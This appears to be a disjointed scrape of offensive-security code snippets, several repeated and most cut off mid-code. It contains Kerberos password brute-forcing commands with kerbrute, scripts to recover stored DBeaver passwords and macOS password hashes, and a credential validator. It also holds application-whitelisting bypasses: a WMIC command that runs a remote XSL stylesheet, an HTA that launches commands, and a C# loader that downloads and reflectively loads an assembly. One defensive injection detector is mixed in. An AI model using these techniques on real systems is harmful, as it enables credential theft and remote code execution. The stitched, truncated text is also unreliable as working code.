With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:
| # https://stackoverflow.com/questions/39928401/recover-db-password-stored-in-my-dbeaver-connection | |
| # requires pycryptodome lib (pip install pycryptodome) | |
| import sys | |
| import base64 | |
| import os | |
| import json | |
| from Crypto.Cipher import AES |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:
| function Get-InjectedThread | |
| { | |
| <# | |
| .SYNOPSIS | |
| Looks for threads that were created as a result of code injection. | |
| .DESCRIPTION | |
| #!/usr/bin/env python3 | |
| """ | |
| Mac OSX Catalina User Password Hash Extractor | |
| Extracts a user's password hash as a hashcat-compatible string. | |
| Mac OSX Catalina (10.15) uses a salted SHA-512 PBKDF2 for storing user passwords | |
| (hashcat type 7100), and it's saved in an annoying binary-plist-nested-inside-xml-plist | |
| format, so previously reported methods for extracting the hash don't work. |
| function Test-WinCredential { | |
| <# | |
| .SYNOPSIS | |
| Validates Windows user credentials. | |
| .DESCRIPTION | |
| Validates a [pscredential] instance representing user-account credentials | |
| against the current user's logon domain or local machine. | |
| .PARAMETER Credential |
| function Test-WinCredential { | |
| <# | |
| .SYNOPSIS | |
| Validates Windows user credentials. | |
| .DESCRIPTION | |
| Validates a [pscredential] instance representing user-account credentials | |
| against the current user's logon domain or local machine. | |
| .PARAMETER Credential |
| <?xml version='1.0'?> | |
| <!-- Discovered by @SubTee and @mattifestation --> | |
| <!-- Execute with: wmic os get /format:"https://webserver/wmic.xsl" --> | |
| <stylesheet | |
| xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | |
| xmlns:user="placeholder" | |
| version="1.0"> | |
| <output method="text"/> | |
| <ms:script implements-prefix="user" language="JScript"> | |
| <![CDATA[ |
| <html> | |
| <head> | |
| <HTA:APPLICATION ID="HelloExample"> | |
| <script language="jscript"> | |
| var c = "cmd.exe /c calc.exe"; | |
| new ActiveXObject('WScript.Shell').Run(c); | |
| </script> | |
| </head> | |
| <body> | |
| <script>self.close();</script> |
| # Compress and decompress byte array | |
| function Get-CompressedByteArray { | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)] | |
| [byte[]] $byteArray = $(Throw("-byteArray is required")) | |
| ) | |
| Process { |
| $Source = @" | |
| using System; | |
| using System.Net; | |
| using System.Reflection; | |
| namespace LoadAssembly { | |
| public static class LoadAssembly { | |
| public static void load() { | |
| WebClient webclient = new WebClient(); | |
| IWebProxy defaultProxy = WebRequest.DefaultWebProxy; | |
| if (defaultProxy != null) { |